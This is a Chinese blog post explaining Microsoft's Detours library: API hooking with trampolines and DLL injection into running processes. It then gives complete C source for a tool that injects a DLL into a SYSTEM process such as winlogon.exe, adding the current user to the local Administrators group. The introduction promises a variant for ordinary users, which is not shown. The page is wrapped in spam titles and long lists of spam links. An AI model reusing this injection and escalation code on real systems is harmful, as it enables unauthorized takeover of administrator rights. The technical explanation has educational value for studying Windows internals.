青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

旅途

如果想飛得高,就該把地平線忘掉

用DETOURS庫獲取NT管理員權(quán)限

---- Detours是微軟開發(fā)的一個(gè)函數(shù)庫(源代碼可在http://research.microsoft.com/sn/detours 免費(fèi)獲得), 用于修改運(yùn)行中的程序在內(nèi)存中的影像,從而即使沒有源代碼也能改變程序的行為。具體用途是:

攔截WIN32 API調(diào)用,將其引導(dǎo)到自己的子程序,從而實(shí)現(xiàn)WIN32 API的定制。
為一個(gè)已在運(yùn)行的進(jìn)程創(chuàng)建一新線程,裝入自己的代碼并運(yùn)行。
---- 本文將簡介Detours的原理,Detours庫函數(shù)的用法, 并利用Detours庫函數(shù)在Windows NT上編寫了一個(gè)程序,該程序能使有“調(diào)試程序”的用戶權(quán)限的用戶成為系統(tǒng)管理員,附錄利用Detours庫函數(shù)修改該程序使普通用戶即可成為系統(tǒng)管理 員.


一. Detours的原理

---- 1. WIN32進(jìn)程的內(nèi)存管理

---- 總所周知,WINDOWS NT實(shí)現(xiàn)了虛擬存儲(chǔ)器,每一WIN32進(jìn)程擁有4GB的虛存空間, 關(guān)于WIN32進(jìn)程的虛存結(jié)構(gòu)及其操作的具體細(xì)節(jié)請參閱WIN32 API手冊, 以下僅指出與Detours相關(guān)的幾點(diǎn):

---- (1) 進(jìn)程要執(zhí)行的指令也放在虛存空間中
---- (2) 可以使用QueryProtectEx函數(shù)把存放指令的頁面的權(quán)限更改為可讀可寫可執(zhí)行,再改寫其內(nèi)容,從而修改正在運(yùn)行的程序
---- (3) 可以使用VirtualAllocEx從一個(gè)進(jìn)程為另一正運(yùn)行的進(jìn)程分配虛存,再使用 QueryProtectEx函數(shù)把頁面的權(quán)限更改為可讀可寫可執(zhí)行,并把要執(zhí)行的指令以二進(jìn)制機(jī)器碼的形式寫入,從而為一個(gè)正在運(yùn)行的進(jìn)程注入任意的代碼

---- 2. 攔截WIN32 API的原理

---- Detours定義了三個(gè)概念:

---- (1) Target函數(shù):要攔截的函數(shù),通常為Windows的API。
---- (2) Trampoline函數(shù):Target函數(shù)的復(fù)制品。因?yàn)镈etours將會(huì)改寫Target函數(shù),所以先把Target函數(shù)復(fù)制保存好,一方面仍然保存Target函數(shù)的過程調(diào)用語義,另一方面便于以后的恢復(fù)。
---- (3) Detour 函數(shù):用來替代Target函數(shù)的函數(shù)。

---- Detours在Target函數(shù)的開頭加入JMP Address_of_ Detour_ Function指令(共5個(gè)字節(jié))把對Target函數(shù)的調(diào)用引導(dǎo)到自己的Detour函數(shù), 把Target函數(shù)的開頭的5個(gè)字節(jié)加上JMP Address_of_ Target _ Function+5作為Trampoline函數(shù)。例子如下:

攔截前:Target _ Function:
 ;Target函數(shù)入口,以下為假想的常見的子程序入口代碼
 push  ebp
 mov  ebp,  esp
 push  eax
 push  ebx
 Trampoline:
 ;以下是Target函數(shù)的繼續(xù)部分
 ……

攔截后: Target _ Function:
 jmp  Detour_Function
 Trampoline:
 ;以下是Target函數(shù)的繼續(xù)部分
 ……

 Trampoline_Function:
 ; Trampoline函數(shù)入口, 開頭的5個(gè)字節(jié)與Target函數(shù)相同
 push  ebp
 mov  ebp,  esp
 push  eax
 push  ebx
 ;跳回去繼續(xù)執(zhí)行Target函數(shù)
 jmp  Target_Function+5
---- 3. 為一個(gè)已在運(yùn)行的進(jìn)程裝入一個(gè)DLL

---- 以下是其步驟:

---- (1) 創(chuàng)建一個(gè)ThreadFuction,內(nèi)容僅是調(diào)用LoadLibrary。
---- (2) 用VirtualAllocEx為一個(gè)已在運(yùn)行的進(jìn)程分配一片虛存,并把權(quán)限更改為可讀可寫可執(zhí)行。
---- (3) 把ThreadFuction的二進(jìn)制機(jī)器碼寫入這片虛存。
---- (4) 用CreateRemoteThread在該進(jìn)程上創(chuàng)建一個(gè)線程,傳入前面分配的虛存的起始地址作為線程函數(shù)的地址,即可為一個(gè)已在運(yùn)行的進(jìn)程裝入一個(gè)DLL。通過DllMain 即可在一個(gè)已在運(yùn)行的進(jìn)程中運(yùn)行自己的代碼。

二. Detours庫函數(shù)的用法

---- 因?yàn)镈etours軟件包并沒有附帶幫助文件,以下接口僅從剖析源代碼得出。

---- 1. PBYTE WINAPI DetourFindFunction(PCHAR pszModule, PCHAR pszFunction)

---- 功能:從一DLL中找出一函數(shù)的入口地址
---- 參數(shù):pszModule是DLL名,pszFunction是函數(shù)名。
---- 返回:名為pszModule的DLL的名為pszFunction的函數(shù)的入口地址
---- 說明:DetourFindFunction除使用GetProcAddress外,還直接分析DLL的文件頭,因此可以找到一些GetProcAddress找不到的函數(shù)入口。

---- 2. DETOUR_TRAMPOLINE(trampoline_prototype, target_name)
---- 功能:該宏把名為target_name 的Target函數(shù)生成Trampoline函數(shù),以后調(diào)用 trampoline_prototype在語義上等于調(diào)用Target函數(shù)。

---- 3. BOOL WINAPI DetourFunctionWithTrampoline(PBYTE pbTrampoline, BYTE pbDetour)
---- 功能:用Detour 函數(shù)攔截Target函數(shù)
---- 參數(shù):pbTrampoline是DETOUR_TRAMPOLINE得到的trampoline_prototype,pbDetour是 Detour 函數(shù)的入口地址。

---- 4. BOOL WINAPI DetourRemoveWithTrampoline(PBYTE pbTrampoline,PBYTE pbDetour)
---- 功能:恢復(fù)Target函數(shù)
---- 參數(shù):pbTrampoline是DETOUR_TRAMPOLINE得到的trampoline_prototype,pbDetour是 Detour 函數(shù)的入口地址。

---- 5. BOOL WINAPI ContinueProcessWithDll(HANDLE hProcess, LPCSTR lpDllName)
---- 功能:為一個(gè)已在運(yùn)行的進(jìn)程裝入一個(gè)DLL
---- 參數(shù):hProcess是進(jìn)程的句柄,lpDllName是要裝入的DLL名

三. 程序?qū)嵗?

---- 以一個(gè)能使有“調(diào)試程序”的用戶權(quán)限的用戶成為系統(tǒng)管理員的程序做例子說明Detours 庫函數(shù)的用法。程序的設(shè)計(jì)思路是找一個(gè)以System帳號(hào)運(yùn)行的進(jìn)程,如spoolss.exe, rpcss.exe, winlogon.exe, service.exe等,使用ContinueProcessWithDll在其中注入把當(dāng)前用戶加入到 Administrators本地組的DLL,因?yàn)樵揇LL在這些進(jìn)程的安全上下文環(huán)境運(yùn)行,所以有相應(yīng)的權(quán)限。

---- 先編寫相應(yīng)的DLL:

/*admin.dll, 當(dāng)進(jìn)程裝入時(shí)會(huì)把名為szAccountName
 的用戶加入到Administrators本地組。*/

#include
#include
#include
#include

/*以下創(chuàng)建一共享段實(shí)現(xiàn)進(jìn)程間的數(shù)據(jù)通訊,
 szAccountName 是用戶名,bPrepared說明
 szAccountName是否已初始化。*/

#pragma data_seg(".MYSHARE")
BOOL bPrepared=FALSE;
wchar_t szAccountName[100]={0};
#pragma data_seg()

#pragma comment(linker, "/SECTION:.MYSHARE,RWS")

/*程序調(diào)用SetAccountName設(shè)置要加入到Administrators
 本地組的用戶名,并通知DllMain
 已初始化szAccountName ,
 以后被裝入時(shí)可調(diào)用ElevatePriv */

__declspec(dllexport) VOID WINAPI
 SetAccountName(wchar_t *Name)
{
wcscpy(szAccountName,Name);
bPrepared=TRUE;
}

/*把名為szAccountName的用戶加入
 到Administrators本地組*/

__declspec(dllexport) VOID WINAPI ElevatePriv()
{
LOCALGROUP_MEMBERS_INFO_3 account;
account.lgrmi3_domainandname=szAccountName;
NetLocalGroupAddMembers(NULL,L"Administrators",
3,(LPBYTE)&account,1);
}

__declspec(dllexport) ULONG WINAPI
DllMain(HINSTANCE hInstance,
DWORD dwReason, PVOID lpReserved)
{
switch (dwReason) {
 case DLL_THREAD_ATTACH:
 if (bPrepared)
   ElevatePriv();
}
return TRUE;
}

程序如下:

/*AddMeToAdministrators.exe 把當(dāng)前用戶加入到
 Administrators本地組。使用方法為:(1)
---- 運(yùn)行任務(wù)管理器找到spoolss.exe或rpcss.exe或winlogon.exe或sevice.exe的進(jìn)程ID (2)執(zhí)行AddMeToAdministrators.exe procid, 其中procid為(1)記下的進(jìn)程ID (3)簽退再簽到,運(yùn)行用戶管理器,即可發(fā)現(xiàn)自己已在Administrators本地組中。*/

#include
#include
#include
#include
#include

extern VOID WINAPI SetAccountName(wchar_t *Name);

/* GetCurrentUser得到自己的用戶名稱*/

void GetCurrentUser(wchar_t *szName)
{
 HANDLE hProcess, hAccessToken;
 wchar_t InfoBuffer[1000],szAccountName[200],
 szDomainName[200];
 PTOKEN_USER pTokenUser = (PTOKEN_USER)InfoBuffer;
 DWORD dwInfoBufferSize,dwAccountSize = 200,
 dwDomainSize = 200;
 SID_NAME_USE snu;

 hProcess = GetCurrentProcess();

 OpenProcessToken(hProcess,TOKEN_READ,&hAccessToken);

 GetTokenInformation(hAccessToken,TokenUser,
 InfoBuffer,
     1000, &dwInfoBufferSize);

 LookupAccountSid(NULL, pTokenUser->User.Sid,
 szAccountName,
     &dwAccountSize,szDomainName, &dwDomainSize, &snu);
 wcscpy(szName,szDomainName);
 wcscat(szName,L"\\");
 wcscat(szName,szAccountName);
}

/* EnablePrivilege啟用自己的“調(diào)試程序”的用戶權(quán)限*/

BOOL EnablePrivilege(LPCTSTR szPrivName,BOOL fEnable)
{
HANDLE hToken;
if (!OpenProcessToken(GetCurrentProcess(),
           TOKEN_ADJUST_PRIVILEGES, &hToken))
 return FALSE;
TOKEN_PRIVILEGES tp;
tp.PrivilegeCount = 1;
LookupPrivilegeValue(NULL, szPrivName,
&tp.Privileges[0].Luid);
tp.Privileges[0].Attributes = fEnable ?
SE_PRIVILEGE_ENABLED : 0;
AdjustTokenPrivileges(hToken, FALSE, &tp,
sizeof(tp), NULL, NULL);
return((GetLastError() == ERROR_SUCCESS));
}

int WINAPI WinMain(HINSTANCE hinst, HINSTANCE hprev,
LPSTR lpszCmdLine, int
nCmdShow)
{
INT argc;
WCHAR **argv;
argv = CommandLineToArgvW(GetCommandLineW(),
&argc);
INT nProcessId = -1;
if (argc!=2){
 wprintf(L"usage %s pid", argv[0]);
 return 1;
}
nProcessId = _wtoi(argv[1]);
printf("%d\n",nProcessId);
---- /*要成功執(zhí)行ContinueProcessWithDll,要對winlogon.exe等進(jìn)程的進(jìn)程句柄有讀寫存儲(chǔ)器內(nèi)容和創(chuàng)建線程的權(quán)限,EnablePrivilege使本進(jìn)程有這樣的權(quán)利。*/

if (!EnablePrivilege(SE_DEBUG_NAME, TRUE)){
 printf("AdjustTokenPrivilege Fail %u\n",
(UINT)GetLastError());
 return 1;
}
HANDLE  gNewHandle =
OpenProcess(PROCESS_ALL_ACCESS
, TRUE, nProcessId);
if (!gNewHandle){
 printf("OpenProcess Fail %u\n",
(UINT)GetLastError());
 return 1;
}
 wchar_t szName[100];
GetCurrentUser(szName);
SetAccountName(szName);
If (!ContinueProcessWithDll(gNewHandle,
L"c:\\temp\\admin.dll")) {
 printf("ContinueProcessWithDll failed %u",
(UINT)GetLastError());
 return 3;
}
return 0;
}
---- 因?yàn)?#8220;調(diào)試程序”的用戶權(quán)限缺省情況下僅賦予給管理員,因此并不會(huì)造成安全漏洞。但該程序揭示出“調(diào)試程序”的用戶權(quán)限其實(shí)是至高無上的用戶權(quán)限,只能授予給可信用戶。

四. 結(jié)論 ---- Detours是一強(qiáng)大的工具,提供了簡單易用的函數(shù)接口來攔截WIN32 API調(diào)用和為一個(gè)已在運(yùn)行的進(jìn)程裝入一個(gè)DLL。  
 

Trackback: http://tb.blog.csdn.net/TrackBack.aspx?PostId=1628087


posted on 2007-07-29 13:10 旅途 閱讀(554) 評論(0)  編輯 收藏 引用 所屬分類: 深入windows

青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品
  • <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            欧美日本不卡高清| 欧美日韩在线播放三区| 国产伦精品一区二区三区视频孕妇 | 日韩系列在线| 亚洲国产高清一区| 蜜桃av一区二区三区| 亚洲大片一区二区三区| 亚洲国产成人精品久久| 欧美成人精品一区二区三区| 亚洲精品九九| 日韩一级精品视频在线观看| 国产精品电影观看| 午夜日韩在线观看| 亚洲人成人99网站| 亚洲成人在线网站| 欧美欧美午夜aⅴ在线观看| 一区二区三区欧美在线| 一区二区三区福利| 国产一区深夜福利| 欧美大片免费观看| 欧美日韩中文另类| 久久久精品动漫| 欧美激情导航| 久久久久国产精品一区| 欧美精品 日韩| 欧美一区午夜精品| 99re热精品| 一区二区三区四区国产精品| 国模一区二区三区| 亚洲欧洲精品一区| 国产精品永久免费| 欧美国产亚洲另类动漫| 欧美特黄a级高清免费大片a级| 久久精品91久久久久久再现| 蜜臀久久久99精品久久久久久| 亚洲综合成人在线| 久久久7777| 亚洲欧美在线高清| 欧美不卡在线| 久久五月天婷婷| 国产精品高潮久久| 欧美不卡高清| 国产精品午夜国产小视频| 欧美国产视频在线| 国产一区二区高清不卡| 亚洲精品美女久久7777777| 国产日韩欧美一区| 国产精品99久久99久久久二8 | 在线电影国产精品| 亚洲手机视频| 亚洲美女精品久久| 久久婷婷一区| 久久精品在线视频| 国产精品久久久免费| 亚洲高清不卡av| 尤物在线观看一区| 午夜亚洲一区| 欧美亚洲自偷自偷| 欧美三级在线视频| 亚洲精品免费一二三区| 亚洲黄色精品| 玖玖国产精品视频| 免费成人美女女| 国产一区在线播放| 午夜国产一区| 欧美一区二区三区四区在线观看地址 | 欧美午夜不卡视频| 亚洲国产mv| 亚洲乱码国产乱码精品精| 麻豆精品视频在线观看| 鲁大师成人一区二区三区| 国产亚洲成年网址在线观看| 亚洲欧美成人一区二区在线电影 | 亚洲欧美日韩区| 欧美日韩一区二区在线观看视频| 亚洲国产精品尤物yw在线观看| 伊人精品成人久久综合软件| 久久精品免费播放| 老色鬼久久亚洲一区二区| 激情欧美丁香| 老司机久久99久久精品播放免费| 美女网站久久| 日韩亚洲在线| 欧美无砖砖区免费| 亚久久调教视频| 欧美sm视频| 亚洲黄色尤物视频| 欧美精品www| 一区二区欧美日韩| 久久精品国产精品| 亚洲国产精品一区二区第一页| 麻豆亚洲精品| 一区二区三区成人精品| 久久不射电影网| 亚洲国产精品国自产拍av秋霞| 欧美激情第4页| 亚洲一区二区三区四区五区黄 | 一区二区三区精品视频在线观看| 国产精品成人aaaaa网站| 亚洲欧美久久| 欧美大学生性色视频| 中文在线资源观看网站视频免费不卡| 国产精品av一区二区| 欧美一区二区三区视频免费| 欧美国产大片| 欧美中文在线视频| 亚洲激情网站免费观看| 国产精品久久久久久久午夜片| 欧美尤物一区| 一本久久a久久精品亚洲| 久久久久在线| 亚洲欧美日韩高清| 在线观看亚洲| 国产精品无码永久免费888| 麻豆久久婷婷| 欧美一区二区私人影院日本 | 欧美1区视频| 亚洲欧美日韩网| 亚洲国产高清aⅴ视频| 国产精品萝li| 欧美精品免费在线观看| 久久av一区二区三区| 一区二区三区黄色| 欧美二区在线观看| 久久久www成人免费无遮挡大片 | 亚洲电影观看| 国产欧美在线观看| 欧美日韩视频第一区| 美女脱光内衣内裤视频久久网站| 午夜精品一区二区三区电影天堂 | 亚洲欧美视频在线| 最新日韩在线| 欧美高清视频www夜色资源网| 欧美伊人久久| 亚洲永久网站| 一本久道久久综合狠狠爱| 亚洲啪啪91| 亚洲国产精品第一区二区| 好男人免费精品视频| 国产欧美日韩精品一区| 国产精品国产a| 欧美三级在线播放| 欧美精品免费播放| 欧美激情在线免费观看| 免费av成人在线| 免费人成网站在线观看欧美高清| 久久成人免费日本黄色| 欧美影院视频| 久久久成人精品| 久久精品国产一区二区三区免费看| 亚洲欧洲99久久| 香蕉国产精品偷在线观看不卡| 亚洲永久精品国产| 亚洲欧美三级伦理| 欧美在线视频二区| 久久激情五月激情| 久久蜜桃香蕉精品一区二区三区| 久久噜噜亚洲综合| 久久综合电影| 欧美国产日韩一区二区三区| 欧美精品v日韩精品v国产精品| 欧美日韩国产精品一区二区亚洲| 欧美日韩一区二区三区在线视频| 欧美日韩亚洲一区二| 国产精品尤物| 一区二区三区在线观看视频| 亚洲激情午夜| 一区二区高清在线| 欧美一区永久视频免费观看| 久久久久女教师免费一区| 欧美黄网免费在线观看| 亚洲日本一区二区| 亚洲欧美美女| 噜噜噜在线观看免费视频日韩| 欧美精品久久久久久久久老牛影院| 欧美日韩在线高清| 国产中文一区二区| 日韩一级片网址| 性伦欧美刺激片在线观看| 欧美国产日韩xxxxx| aa级大片欧美| 久久久999成人| 欧美精品一二三| 国产亚洲一区二区三区在线播放 | 国产精品久久97| 精品成人久久| 亚洲一区二区三区四区视频| 久久午夜av| 一道本一区二区| 卡通动漫国产精品| 国产精品丝袜xxxxxxx| 亚洲国产免费| 久久aⅴ国产欧美74aaa| 亚洲国产精品99久久久久久久久| 亚洲一区二区黄| 欧美精品综合| 一区二区三区自拍| 小黄鸭精品密入口导航| 亚洲国产视频一区| 久久久久久久综合狠狠综合|